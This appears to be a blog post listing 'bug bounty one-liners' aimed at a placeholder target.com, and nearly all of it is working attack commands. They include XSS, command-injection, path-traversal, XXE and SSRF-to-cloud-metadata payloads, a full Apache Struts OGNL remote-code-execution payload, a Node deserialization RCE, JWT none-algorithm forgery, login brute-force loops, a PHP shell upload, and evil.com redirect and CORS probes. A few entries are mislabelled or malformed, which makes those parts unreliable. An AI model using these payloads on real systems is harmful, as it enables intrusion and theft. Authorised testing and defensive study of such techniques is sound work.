Search for SQL Dumps and Backup Files (db.sql/db.zip)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/db.sql\n/backup.sql\n/database.sql') -mc 200 -o sql_dumps_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect LFI Points (path traversal)

cat subdomains.txt | gf lfi | httpx -silent -o lfi_possible_urls.txt
Enter fullscreen mode Exit fullscreen mode

Identify Reflected XSS via GET Parameters

cat subdomains.txt | gf xss | qsreplace '"><img src=x onerror=alert(document.domain)>' | httpx -silent -fr '"><img src=x onerror=alert' -o reflected_xss.txt
Enter fullscreen mode Exit fullscreen mode

Find Outdated WordPress Versions (Vuln Detection)

cat subdomains.txt | httpx -silent -path /readme.html -mc 200 -o wordpress_readme.txt
Enter fullscreen mode Exit fullscreen mode

Search for PHPMyAdmin Exposed Panels

cat subdomains.txt | httpx -silent -path /phpmyadmin -mc 200 -o phpmyadmin_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Command Injection Points

cat subdomains.txt | gf command-injection | qsreplace ';id' | httpx -silent -fr 'uid=' -o cmd_injection.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Docker Daemon API (Remote Control)

naabu -list subdomains.txt -p 2375 -silent | httpx -silent -o docker_api_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Identify Open Git Directories (.git Exposed)

cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o git_dirs_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed Server Status Pages (Apache/Nginx)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/server-status\n/nginx-status') -mc 200 -o server_status_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open Jenkins Panels with Script Console

cat subdomains.txt | httpx -silent -path /script -mc 200 -o jenkins_script_console.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed AWS S3 Buckets via Subdomains

cat subdomains.txt | nuclei -t s3-detect.yaml -o open_s3_buckets.txt
Enter fullscreen mode Exit fullscreen mode

Search for Potential Open Redirects (Unsafe Redirects)

cat subdomains.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt
Enter fullscreen mode Exit fullscreen mode

Find Debug/Error Pages (Sensitive Stacktrace)

cat subdomains.txt | httpx -silent -sc -fr 'error\|exception\|trace' -o error_pages.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Jenkins API Endpoints

cat subdomains.txt | httpx -silent -path /api/json -mc 200 -o jenkins_api_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Kubernetes Dashboard (Cluster Control)

cat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect SSRF via Open Redirect Chains

cat subdomains.txt | gf ssrf | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id\|instance-id' -o ssrf_exploitable.txt
Enter fullscreen mode Exit fullscreen mode

Look for Backup or Archive Files (tar.gz, zip)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.tar.gz\n/site-backup.zip') -mc 200 -o backup_files_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Identify Known Vulnerable CMS Versions

nuclei -l subdomains.txt -t cves/ -o cms_cve_vulns.txt
Enter fullscreen mode Exit fullscreen mode

Find JWT Tokens or Sensitive Tokens in Responses

cat subdomains.txt | httpx -silent -sr | grep -Eo 'eyJ[^"]+' | tee jwt_tokens.txt
Enter fullscreen mode Exit fullscreen mode

Detect Basic Auth Protected Pages (Bruteforce Target)

cat subdomains.txt | httpx -silent -sc -H "Authorization: Basic fakeauth" -o basic_auth_detected.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed .git Repositories (Full Source Code Leak)

cat subdomains.txt | httpx -silent -path /.git/config -mc 200 -o exposed_git_repos.txt
Enter fullscreen mode Exit fullscreen mode

Find Public .DS_Store Files (Directory Listing Exposure)

cat subdomains.txt | httpx -silent -path /.DS_Store -mc 200 -o ds_store_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Exposed .svn Repos (Source Code Leak)

cat subdomains.txt | httpx -silent -path /.svn/entries -mc 200 -o svn_repos_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Open GraphQL Endpoints (GraphQL Injection)

cat subdomains.txt | httpx -silent -path /graphql -mc 200 -o graphql_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Laravel Debug Pages (Full App Secrets)

cat subdomains.txt | httpx -silent -path /_ignition/health-check -mc 200 -o laravel_debug_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Check for File Upload Points (RCE Chances)

cat subdomains.txt | gf upload | httpx -silent -o file_upload_points.txt
Enter fullscreen mode Exit fullscreen mode

Find XML External Entity (XXE) Injection Points

cat subdomains.txt | gf xxe | qsreplace 'file:///etc/passwd' | httpx -silent -fr 'root:x' -o xxe_exploitable.txt
Enter fullscreen mode Exit fullscreen mode

Detect Misconfigured AWS Cognito Pools (Token Takeover)

cat subdomains.txt | nuclei -t misconfiguration/cognito-detect.yaml -o aws_cognito_misconfig.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Open Cloud Storage Buckets (GCP/Azure)

cat subdomains.txt | nuclei -t exposed-storage/ -o cloud_buckets_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Sensitive Files via URL Fuzzing

ffuf -u FUZZ -w wordlists/sensitive-files.txt -mc 200 -o sensitive_files_found.txt
Enter fullscreen mode Exit fullscreen mode

Detect Open Prometheus Panels (Monitoring Exposure)

cat subdomains.txt | httpx -silent -path /graph -mc 200 -o prometheus_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Redirection in APIs

cat subdomains.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects_apis.txt
Enter fullscreen mode Exit fullscreen mode

Detect Misconfigured CORS (Any Origin Allowed)

cat subdomains.txt | httpx -silent -H "Origin: https://evil.com" -fr "access-control-allow-origin: https://evil.com" -o misconfigured_cors.txt
Enter fullscreen mode Exit fullscreen mode

Detect Backup Archives (Zip/Tar Files)

cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/backup.tar.gz\n/site-backup.zip') -mc 200 -o backup_archives_found.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed Debug Logs (Stack Traces, Errors)

cat subdomains.txt | httpx -silent -path /debug.log -mc 200 -o debug_logs_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for SSRF via Parameter Fuzzing

cat subdomains.txt | gf ssrf | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id\|instance-id' -o ssrf_targets.txt
Enter fullscreen mode Exit fullscreen mode

Identify Server Headers for Misconfig Analysis

cat subdomains.txt | httpx -silent -sc -H 'X-Check: true' -o headers_info.txt
Enter fullscreen mode Exit fullscreen mode

Detect Missing Security Headers (Hardening Issues)

cat subdomains.txt | nuclei -t security-misconfiguration/ -o missing_security_headers.txt
Enter fullscreen mode Exit fullscreen mode

Find Exposed WordPress Debug Logs

cat subdomains.txt | httpx -silent -path /wp-content/debug.log -mc 200 -o wordpress_debug_log.txt
Enter fullscreen mode Exit fullscreen mode

Detect Exposed GITLAB CI Files (Pipeline Secrets)

cat subdomains.txt | httpx -silent -path /.gitlab-ci.yml -mc 200 -o gitlab_ci_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Find API Keys Leaked in JS Files

katana -list subdomains.txt -silent -js | grep -E 'apiKey|client_secret|access_token' -o api_keys_leaked.txt
Enter fullscreen mode Exit fullscreen mode

Detect Old PHPMyAdmin Panels (Known Vulns)

cat subdomains.txt | httpx -silent -path /phpmyadmin/ -mc 200 -o phpmyadmin_found.txt
Enter fullscreen mode Exit fullscreen mode

Identify Exposed Kibana Panels (Log Monitoring)

cat subdomains.txt | httpx -silent -path /app/kibana -mc 200 -o kibana_panels_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Scan for Path Traversal (../../etc/passwd)

cat subdomains.txt | gf lfi | qsreplace '../../etc/passwd' | httpx -silent -fr 'root:x' -o path_traversal_found.txt
Enter fullscreen mode Exit fullscreen mode

Find Open Admin Panels (Unprotected Login)

cat subdomains.txt | nuclei -t exposed-panels/ -o admin_panels_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Detect Known CVEs via Nuclei (Automated Vuln Scan)

nuclei -l subdomains.txt -t cves/ -o known_cves_found.txt
Enter fullscreen mode Exit fullscreen mode

Identify Unsafe Redirects (via Location Header)

cat subdomains.txt | httpx -silent -sc -o redirects.txt && cat redirects.txt | grep 'Location:' | grep -i 'http'
Enter fullscreen mode Exit fullscreen mode

Find Kubernetes Dashboard Exposures

cat subdomains.txt | httpx -silent -path /api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/ -mc 200 -o k8s_dashboard_exposed.txt
Enter fullscreen mode Exit fullscreen mode

Exposed Swagger / API Documentation

curl -s https://target.com/swagger.json
Enter fullscreen mode Exit fullscreen mode

Admin Panel Discovery (CMS Detection)

curl -s https://target.com/admin/ | grep -i 'cms'
Enter fullscreen mode Exit fullscreen mode

GCP Metadata SSRF Check

curl "https://target.com/?url=http://metadata.google.internal/computeMetadata/v1/ -H 'Metadata-Flavor: Google'"
Enter fullscreen mode Exit fullscreen mode

Azure Metadata Leak via SSRF

curl "https://target.com/?url=http://169.254.169.254/metadata/instance?api-version=2021-01-01" -H "Metadata: true"
Enter fullscreen mode Exit fullscreen mode

OAuth Token Leak in Referrer

curl -I https://target.com/oauth/callback?code=abcd1234
Enter fullscreen mode Exit fullscreen mode

AWS Keys Hunt in Public Repos (with GitHub CLI)

gh search code "AWS_ACCESS_KEY_ID" --language python --limit 100
Enter fullscreen mode Exit fullscreen mode

IDOR via Incrementing Document IDs

for id in $(seq 1 100); do curl -s https://target.com/documents/$id; done
Enter fullscreen mode Exit fullscreen mode

Sensitive Backup File Discovery

curl -I https://target.com/config.bak
Enter fullscreen mode Exit fullscreen mode

JWT Key Disclosure via Well-Known File

curl -s https://target.com/.well-known/jwks.json
Enter fullscreen mode Exit fullscreen mode

Mobile Deep Link Misconfig Check

adb shell am start -a android.intent.action.VIEW -d "target://app/link?param=test"
Enter fullscreen mode Exit fullscreen mode

Testing Rate Limiting (Brute Force)

seq 1 1000 | xargs -P10 -I{} curl -X POST "https://target.com/api/login" -d 'user=admin&password=wrong{}'
Enter fullscreen mode Exit fullscreen mode

Client-Side Security Headers Audit

curl -I https://target.com | grep -Ei 'strict-transport|content-security|x-frame'
Enter fullscreen mode Exit fullscreen mode

Session Fixation Check

Reuse session after login/logout:

curl -c cookies.txt https://target.com/login && curl -b cookies.txt https://target.com/dashboard
Enter fullscreen mode Exit fullscreen mode

Exposed Debug Endpoints

curl -s https://target.com/debug/vars
Enter fullscreen mode Exit fullscreen mode

Direct Database Query via GraphQL

curl -X POST https://target.com/graphql -d '{"query":"{users{username,password}}"}'
Enter fullscreen mode Exit fullscreen mode

DNS Zone Transfer Misconfig (AXFR)

dig axfr target.com @ns1.target.com
Enter fullscreen mode Exit fullscreen mode

Misconfigured CNAME Takeover

dig cname subdomain.target.com
Enter fullscreen mode Exit fullscreen mode

LFI via Parameter Tampering

curl "https://target.com/page?file=../../../../etc/passwd"
Enter fullscreen mode Exit fullscreen mode

WebSocket Security Check (Frame Injection)

wscat -c ws://target.com/socket
Enter fullscreen mode Exit fullscreen mode

Sensitive Parameter Brute Force

cat params.txt | xargs -I{} curl -s "https://target.com/?{}=test"
Enter fullscreen mode Exit fullscreen mode

GraphQL Introspection Check

curl -X POST https://target.com/graphql -d '{"query":"{__schema{types{name}}}"}'
Enter fullscreen mode Exit fullscreen mode

Public GitHub Secrets Hunt

gh search code "api_key" --repo target/repo
Enter fullscreen mode Exit fullscreen mode

CSP Bypass Discovery

curl -I https://target.com | grep -i content-security-policy
Enter fullscreen mode Exit fullscreen mode

Kubernetes Dashboard Exposure

curl -k https://target.com/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/
Enter fullscreen mode Exit fullscreen mode

Google Dorking One-Liner

xdg-open "https://www.google.com/search?q=site:target.com filetype:env"
Enter fullscreen mode Exit fullscreen mode

Firebase Database Exposure Check

curl -s https://target.firebaseio.com/.json
Enter fullscreen mode Exit fullscreen mode

Header Injection Test

curl -I "https://target.com/%0D%0AX-Test:evil"
Enter fullscreen mode Exit fullscreen mode

AWS S3 Bucket Direct List

curl https://target.s3.amazonaws.com/
Enter fullscreen mode Exit fullscreen mode

Test SSRF via Redirect

curl "https://target.com/redirect?url=http://169.254.169.254"
Enter fullscreen mode Exit fullscreen mode

Test Command Injection via Headers

curl -H "User-Agent: ;id" https://target.com/
Enter fullscreen mode Exit fullscreen mode

Exposed Git Folder

curl -s https://target.com/.git/config
Enter fullscreen mode Exit fullscreen mode

GCP Storage Bucket Exposure

curl -s https://storage.googleapis.com/target-bucket-name/
Enter fullscreen mode Exit fullscreen mode

Open Redirect Discovery

curl -I "https://target.com/redirect?url=https://evil.com"
Enter fullscreen mode Exit fullscreen mode

Fast Path Traversal Discovery

curl "https://target.com/download?file=../../../../etc/passwd"
Enter fullscreen mode Exit fullscreen mode

Testing File Upload Handling

curl -F "file=@/etc/passwd" https://target.com/upload
Enter fullscreen mode Exit fullscreen mode

Subdomain Takeover Check (CNAME)

dig cname sub.target.com
Enter fullscreen mode Exit fullscreen mode

Check for Anonymous FTP Access

ftp target.com
Enter fullscreen mode Exit fullscreen mode

Backup Files Finder

curl -I https://target.com/index.php.bak
Enter fullscreen mode Exit fullscreen mode

CloudFront Misconfiguration Detection

curl -I https://target.cloudfront.net
Enter fullscreen mode Exit fullscreen mode

Public Trello/Slack Links in Code

gh search code "trello.com/b/" --repo target/repo
Enter fullscreen mode Exit fullscreen mode

Email Spoofing via Misconfigured SPF

dig txt target.com
Enter fullscreen mode Exit fullscreen mode

Weak JWT Secret Guessing

echo -n 'eyJhbGciOiAiSFMyNTYifQ.eyJ1c2VyIjogImFkbWluIn0' | base64 -d
Enter fullscreen mode Exit fullscreen mode

Test for Public Firebase Storage

curl -s https://target.firebaseio.com/.json
Enter fullscreen mode Exit fullscreen mode

Unrestricted File Download (Insecure Direct Object Reference)

curl -s https://target.com/files/1.pdf
Enter fullscreen mode Exit fullscreen mode

Discover Admin Portals

gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Enter fullscreen mode Exit fullscreen mode

Check for Debug Endpoints

curl -s https://target.com/debug/vars
Enter fullscreen mode Exit fullscreen mode

Server Header Disclosure

curl -I https://target.com | grep Server
Enter fullscreen mode Exit fullscreen mode

Find Exposed GitHub Actions Secrets

gh api repos/target/repo/actions/secrets
Enter fullscreen mode Exit fullscreen mode

Test Blind XSS via User-Agent

curl -A "<script>alert(document.domain)</script>" https://target.com/
Enter fullscreen mode Exit fullscreen mode

Test for PHP Info Disclosure

curl -s https://target.com/phpinfo.php
Enter fullscreen mode Exit fullscreen mode

Exposed Kubernetes Dashboard via Proxy

curl -k https://target.com/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/
Enter fullscreen mode Exit fullscreen mode

GraphQL Schema Discovery

curl -X POST https://target.com/graphql -d '{"query":"{__schema{types{name}}}"}'
Enter fullscreen mode Exit fullscreen mode

Check for Exposed AWS Lambda Function

curl -s https://target.com/.netlify/functions/
Enter fullscreen mode Exit fullscreen mode

Sensitive Parameter Fuzzing

ffuf -u https://target.com/?FUZZ=test -w params.txt
Enter fullscreen mode Exit fullscreen mode

Detect Misconfigured CORS

curl -I -H "Origin: https://evil.com" https://target.com
Enter fullscreen mode Exit fullscreen mode

Check for Weak JWT Tokens (None Algorithm)

curl -s https://target.com/api -H "Authorization: Bearer eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ."
Enter fullscreen mode Exit fullscreen mode

Exposed .env Files (Sensitive Config)

curl -s https://target.com/.env
Enter fullscreen mode Exit fullscreen mode

Sensitive GitHub Issues (Bug Bounty Targets)

gh issue list --repo target/repo --search "security"
Enter fullscreen mode Exit fullscreen mode

Exposed Internal IP Disclosure via Headers

curl -I https://target.com | grep -i 'x-originating-ip\|x-forwarded-for'
Enter fullscreen mode Exit fullscreen mode

Reverse Proxy Bypass Tricks

curl -I https://target.com/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
Enter fullscreen mode Exit fullscreen mode

Check for SSRF via Open Redirects

curl "https://target.com/redirect?url=http://burpcollaborator.net"
Enter fullscreen mode Exit fullscreen mode

Check for Command Injection in Parameters

curl "https://target.com/ping?host=127.0.0.1;id"
Enter fullscreen mode Exit fullscreen mode

Test for XML External Entity (XXE)

curl -X POST https://target.com/upload -d '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>'
Enter fullscreen mode Exit fullscreen mode

Test for Server-Side Template Injection (SSTI)

curl "https://target.com/render?template={{7*7}}"
Enter fullscreen mode Exit fullscreen mode

Sensitive File Leak Check (.DS_Store, .bak)

curl -I https://target.com/.DS_Store
Enter fullscreen mode Exit fullscreen mode

DNS Takeover Discovery

host -t cname sub.target.com
Enter fullscreen mode Exit fullscreen mode

Test for Misconfigured CORS (Wildcard Origin)

curl -I -H "Origin: https://evil.com" https://target.com
Enter fullscreen mode Exit fullscreen mode

Directory Traversal with Double Encoding

curl "https://target.com/download?file=%252E%252E%252F%252E%252E%252Fetc%252Fpasswd"
Enter fullscreen mode Exit fullscreen mode

Check for Exposed Configuration Files

curl -s https://target.com/wp-config.php
Enter fullscreen mode Exit fullscreen mode

Find Environment Variables in Responses

curl -s https://target.com | grep -E 'AWS_ACCESS_KEY|DB_PASSWORD'
Enter fullscreen mode Exit fullscreen mode

Check for Misconfigured Security Headers

curl -I https://target.com | grep -i "X-Frame-Options\|Content-Security-Policy\|Strict-Transport-Security"
Enter fullscreen mode Exit fullscreen mode

Test for Gopher SSRF

curl "https://target.com/?url=gopher://127.0.0.1:6379/_INFO"
Enter fullscreen mode Exit fullscreen mode

Open Admin Panels Discovery

gobuster dir -u https://target.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,aspx
Enter fullscreen mode Exit fullscreen mode

Exposed Docker API

curl -s http://target.com:2375/containers/json
Enter fullscreen mode Exit fullscreen mode

Check for Log Injection

curl "https://target.com/login?username=%0a%0dINJECTEDLOG&password=test"
Enter fullscreen mode Exit fullscreen mode

Test for Prototype Pollution

curl "https://target.com/api?__proto__[polluted]=true"
Enter fullscreen mode Exit fullscreen mode

Exposed Backup Files via Common Extensions

curl -I https://target.com/index.php~
Enter fullscreen mode Exit fullscreen mode

Check for Arbitrary File Read (Java Web Apps)

curl -s https://target.com/admin/..;/WEB-INF/web.xml
Enter fullscreen mode Exit fullscreen mode

Check for Error-Based SQL Injection

curl "https://target.com/product?id=1'"
Enter fullscreen mode Exit fullscreen mode

Check for Misconfigured Exposed GitLab/GitHub Pages

curl -I https://target.com/.gitlab-ci.yml
Enter fullscreen mode Exit fullscreen mode

Find Public S3 Buckets in JavaScript Files

curl -s https://target.com/app.js | grep "s3.amazonaws.com"
Enter fullscreen mode Exit fullscreen mode

Test for Apache Struts RCE (Legacy)

curl -X POST -H "Content-Type: %{(#_=‘multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=‘id’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,‘/c’,#cmd}:{‘/bin/sh’,‘-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}" https://target.com/upload.action
Enter fullscreen mode Exit fullscreen mode

Detect Java Deserialization (CommonsCollections)

curl -X POST -H "Content-Type: application/x-java-serialized-object" --data-binary @exploit.ser https://target.com/upload
Enter fullscreen mode Exit fullscreen mode

Exposed Jenkins Console

curl -s https://target.com/script
Enter fullscreen mode Exit fullscreen mode

Insecure Cookie Handling Check

curl -I https://target.com | grep -i Set-Cookie
Enter fullscreen mode Exit fullscreen mode

💻 Ultimate Bug Bounty One-Liners - Part 4

Find API Endpoints Directly from Web Responses

curl -s https://target.com | grep -oE 'https?://[^"]+/api/[^"]+' | sort -u
Enter fullscreen mode Exit fullscreen mode

Find Hardcoded Secrets in JS Files

curl -s https://target.com/app.js | grep -E "apikey|token|password|secret|client_id"
Enter fullscreen mode Exit fullscreen mode

Detect GraphQL Endpoints Automatically

curl -I https://target.com/graphql
Enter fullscreen mode Exit fullscreen mode

Test for Insecure Deserialization via JSON

curl -X POST https://target.com/api/v1/process -H "Content-Type: application/json" -d '{"user":"_$$ND_FUNC$$_function(){require(\"child_process\").exec(\"id\")}()"}'
Enter fullscreen mode Exit fullscreen mode

Detect AWS Keys Leaked in Source

curl -s https://target.com/app.js | grep -E "AKIA[0-9A-Z]{16}"
Enter fullscreen mode Exit fullscreen mode

Check for Insecure Direct Object Reference (IDOR)

curl "https://target.com/api/v1/users/1234" -b "session=your_cookie_here"
Enter fullscreen mode Exit fullscreen mode

Change 1234 to 1233 or 1235 and see if you access other user data.

Test for JWT None Algorithm Vulnerability

echo '{"alg":"none","typ":"JWT"}' | base64 | tr -d '=' | tr '/+' '_-' | tr -d '\n' | xargs -I % curl -H "Authorization: Bearer %.eyJ1c2VyIjoiYWRtaW4ifQ." https://target.com/api/private
Enter fullscreen mode Exit fullscreen mode

Find Sensitive Pages via Archive.org

curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | grep -E "backup|admin|.sql|.env|.git"
Enter fullscreen mode Exit fullscreen mode

Here is the converted list:

Test for Server-Side Request Forgery (Advanced)

curl "https://target.com/api/fetch?url=http://burpcollaborator.net"
Enter fullscreen mode Exit fullscreen mode

Auto-Scan for CVEs (Nuclei FTW)

nuclei -u https://target.com -t cves/
Enter fullscreen mode Exit fullscreen mode

Detect Prototype Pollution in Query Strings

curl "https://target.com/api?__proto__[exploit]=polluted"
Enter fullscreen mode Exit fullscreen mode

Test for Cache Poisoning

curl -H "X-Forwarded-Host: evil.com" https://target.com
Enter fullscreen mode Exit fullscreen mode

Find Misconfigured S3 Buckets via Subdomains

host -t cname files.target.com | grep amazonaws
Enter fullscreen mode Exit fullscreen mode

Check for HTTP Parameter Pollution (HPP)

curl "https://target.com/login?user=admin&user=guest"
Enter fullscreen mode Exit fullscreen mode

Test for Open S3 Buckets Directly

aws s3 ls s3://target-bucket-name --no-sign-request
Enter fullscreen mode Exit fullscreen mode

Search for Exposed GitHub Tokens in Source

curl -s https://target.com/app.js | grep -E 'ghp_[a-zA-Z0-9]{36}'
Enter fullscreen mode Exit fullscreen mode

Test for Business Logic Bypass (Rate Limit)

for i in {1..100}; do curl -X POST https://target.com/api/v1/reset-password; done
Enter fullscreen mode Exit fullscreen mode

Detect Information Disclosure via Debug Headers

curl -I https://target.com | grep -i "debug\|x-powered-by\|server"
Enter fullscreen mode Exit fullscreen mode

Detect Unsafe Cross-Origin Resource Sharing (CORS)

curl -I -H "Origin: https://evil.com" https://target.com
Enter fullscreen mode Exit fullscreen mode

Auto-Find Secrets in Git Repos (GitLeaks)

gitleaks detect --source=https://github.com/target/repo.git
Enter fullscreen mode Exit fullscreen mode

Detect Open Redirect via Path Injection

curl "https://target.com/redirect?next=//evil.com"
Enter fullscreen mode Exit fullscreen mode

Find Subdomain Takeover with Subfinder + Nuclei

subfinder -d target.com | nuclei -t takeover/
Enter fullscreen mode Exit fullscreen mode

Test for SOAP Injection (If SOAP API Detected)

curl -X POST https://target.com/soap -d '<?xml version="1.0"?><soap:Envelope><soap:Body><exploit><![CDATA[1 or 1=1]]></exploit></soap:Body></soap:Envelope>'
Enter fullscreen mode Exit fullscreen mode

Detect Weak JWT Secrets (Bruteforce)

jwt-tool eyJhbGciOiJ... --brute --wordlist=/usr/share/wordlists/rockyou.txt
Enter fullscreen mode Exit fullscreen mode

Exposed ENV Files via .env

curl -s https://target.com/.env
Enter fullscreen mode Exit fullscreen mode

Check for Cloud Metadata Exposure (AWS/GCP/Azure)

curl -H "Host: 169.254.169.254" https://target.com
Enter fullscreen mode Exit fullscreen mode

Detect Command Injection via Parameter Fuzzing

curl 'https://target.com/ping?ip=127.0.0.1;id'
Enter fullscreen mode Exit fullscreen mode

Test for Fast Redirect Bypass (Open Redirect)

curl "https://target.com/redirect?url=//evil.com"
Enter fullscreen mode Exit fullscreen mode

Detect Path Traversal in Parameters

curl "https://target.com/api/v1/files?path=../../../../etc/passwd"
Enter fullscreen mode Exit fullscreen mode

Look for Exposed Kubernetes Dashboard

curl -I https://target.com/k8s/
Enter fullscreen mode Exit fullscreen mode

Find Rate Limit Issues in Password Reset API

seq 1 100 | xargs -I % -P 20 curl -X POST https://target.com/api/v1/reset
Enter fullscreen mode Exit fullscreen mode

Test HTTP Smuggling with CRLF Injection

printf "GET / HTTP/1.1\r\nHost: target.com\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nG\r\n\r\n" | nc target.com 80
Enter fullscreen mode Exit fullscreen mode

Detect Client-Side Storage Leaks (localStorage/sessionStorage)

curl -s https://target.com/app.js | grep -i "localStorage\|sessionStorage"
Enter fullscreen mode Exit fullscreen mode

Check for Blind SSRF via PDF Generation

curl -X POST https://target.com/api/generate-pdf -d '{"url":"http://your-collaborator.burpcollaborator.net"}'
Enter fullscreen mode Exit fullscreen mode

Test for Misconfigured CSP (Content Security Policy)

curl -I https://target.com | grep -i "content-security-policy"
Enter fullscreen mode Exit fullscreen mode

Detect Unauthenticated Admin Panels

curl -I https://target.com/admin/
Enter fullscreen mode Exit fullscreen mode

Check for Web Cache Deception

curl -I https://target.com/logout.jpg
Enter fullscreen mode Exit fullscreen mode

Look for Backup Files Exposed

curl -I https://target.com/config.php.bak
Enter fullscreen mode Exit fullscreen mode

Scan for Parameter Pollution (HPP)

curl "https://target.com/api?user=admin&user=guest"
Enter fullscreen mode Exit fullscreen mode

Detect JWT Injection

curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoibWVAdmUuY29tIn0." https://target.com/api/user
Enter fullscreen mode Exit fullscreen mode

Check for Broken Object Level Authorization (BOLA)

curl "https://target.com/api/v1/orders/1001" -b "session=your-cookie"
Enter fullscreen mode Exit fullscreen mode

Change 1001 to 1002, 1003 and see if you can access others' data.

Test for Insecure Redirect via Referer Header

curl -H "Referer: https://evil.com" https://target.com
Enter fullscreen mode Exit fullscreen mode

Identify Leaked API Documentation

curl -s https://target.com/api/docs/
Enter fullscreen mode Exit fullscreen mode

Test for GraphQL Batch Query Abuse

curl -X POST https://target.com/graphql -d '{"query":"{user(id:1) {name} user(id:2) {name} user(id:3) {name}}"}'
Enter fullscreen mode Exit fullscreen mode

Find Misconfigured CORS (Advanced)

curl -I -H "Origin: https://evil.com" https://target.com
Enter fullscreen mode Exit fullscreen mode

Check for WebSockets Injection

wscat -c ws://target.com/socket
Enter fullscreen mode Exit fullscreen mode

Search for Backup Directories in Wayback

curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | grep -iE "\.bak|\.old|\.zip"
Enter fullscreen mode Exit fullscreen mode

Find Laravel .env Exposure

curl -s https://target.com/.env
Enter fullscreen mode Exit fullscreen mode

Detect Exposed Debug Pages (Laravel, Symfony, etc)

curl -I https://target.com/_profiler/
Enter fullscreen mode Exit fullscreen mode

Check for Misconfigured Proxy Headers (IP Spoofing)

curl -H "X-Forwarded-For: 127.0.0.1" https://target.com/admin/
Enter fullscreen mode Exit fullscreen mode

Look for API Key in Mobile App Files

curl -s https://target.com/app.apk | strings | grep -i "apikey\|token"
Enter fullscreen mode Exit fullscreen mode

Scan for WAF Bypass via Encoding

curl --path-as-is "https://target.com/%2e%2e/%2e%2e/admin/"
Enter fullscreen mode Exit fullscreen mode

Test for Host Header Injection

curl -H "Host: evil.com" https://target.com
Enter fullscreen mode Exit fullscreen mode

Look for S3 Bucket Leaks in JS

curl -s https://target.com/app.js | grep -i "s3.amazonaws.com"
Enter fullscreen mode Exit fullscreen mode

Detect File Upload Vulnerabilities

curl -F "file=@evil.php" https://target.com/upload
Enter fullscreen mode Exit fullscreen mode

Top comments (0)